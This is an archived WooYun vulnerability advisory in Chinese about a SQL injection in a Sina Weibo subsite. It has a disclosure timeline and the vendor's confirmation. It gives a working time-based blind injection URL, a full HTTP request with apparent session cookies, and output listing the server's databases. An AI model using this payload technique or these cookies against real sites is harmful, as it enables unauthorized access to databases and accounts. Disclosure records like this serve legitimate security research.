当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171226

漏洞标题:新浪微博某分站SQL注入

相关厂商:新浪微博

漏洞作者: 猪猪侠

提交时间:2016-01-19 21:55

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-19: 厂商已经确认,细节仅向厂商公开
2016-01-29: 细节向核心白帽子及相关领域专家公开
2016-02-08: 细节向普通白帽子公开
2016-02-18: 细节向实习白帽子公开
2016-03-04: 细节向公众公开

简要描述:

新浪微博某分站SQL注入,这是一个新的漏洞,不是重复发的

详细说明:

#1 注入地址,10秒后回显内容

http://lady.weibo.com/hiddphp.php?ac=getorderwb&bid=4&type=cnum  AND (SELECT * FROM (SELECT(SLEEP(10)))ring) &limit=20&page=1&_=1453096501018


注入参数:type
#2 复现说明
该站判断了Referrer,需要指定来自lady.weibo.com

GET /hiddphp.php?ac=getorderwb&bid=4&type=cnum&limit=20&page=1&_=1453096501018 HTTP/1.1
Host: lady.weibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lady.weibo.com/hiddphp.php?ac=getorderwb&bid=4&type=cnum&type=cnum&limit=20&page=1&_=1453096501018
Cookie: UOR=www.wooyun.org,widget.weibo.com,www.wooyun.org; SUBP=.T4z5JpVFriadNx5eGnVqcRt; SINAGLOBAL=6040791878318.437.1407858599027; ULV=:17:2:1:5908426811667.986.1447159422154:1446893097539; SUHB=0btNwWNhyKookA; SUB=-CZS1RB_ujGgzeCrDvzP7-ayu-f3Ff2CQpQ.; dpha=usrmdinst_22; __utma=33263907.1668296230.1453210137.1453210137.1453210137.1; __utmb=33263907.2.10.1453210137; __utmc=33263907; __utmz=33263907.1453210137.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; Hm_lvt_16e2546faf9b04c1e4664a243976b2a9=1453210137; Hm_lpvt_16e2546faf9b04c1e4664a243976b2a9=1453210155; dpvar=usrmdinst_2
X-Forwarded-For: 8.8.8.8
Connection: keep-alive

漏洞证明:

#3 证明

lay.jpg


MySQL > 5.0.11 AND time-based blind
MySQL version() >= 5.0.12


available databases [3]:
[*] information_schema
[*] test
[*] tvic

修复方案:

过滤

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-19 21:59

厂商回复:

感谢支持,漏洞修复中

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-19 21:59 | 故滨 ( 普通白帽子 | Rank:311 漏洞数:40 )

    一楼

  2. 2016-01-19 22:00 | ago ( 普通白帽子 | Rank:548 漏洞数:96 | long long ago,I'm an angry bird.)

    一人一个标题都一样是什么鬼

  3. 2016-01-19 22:29 | hecate ( 普通白帽子 | Rank:754 漏洞数:117 | ®高级安全工程师 | WooYun认证√)

    猪哥多发点,不然要被王婆婆赶上了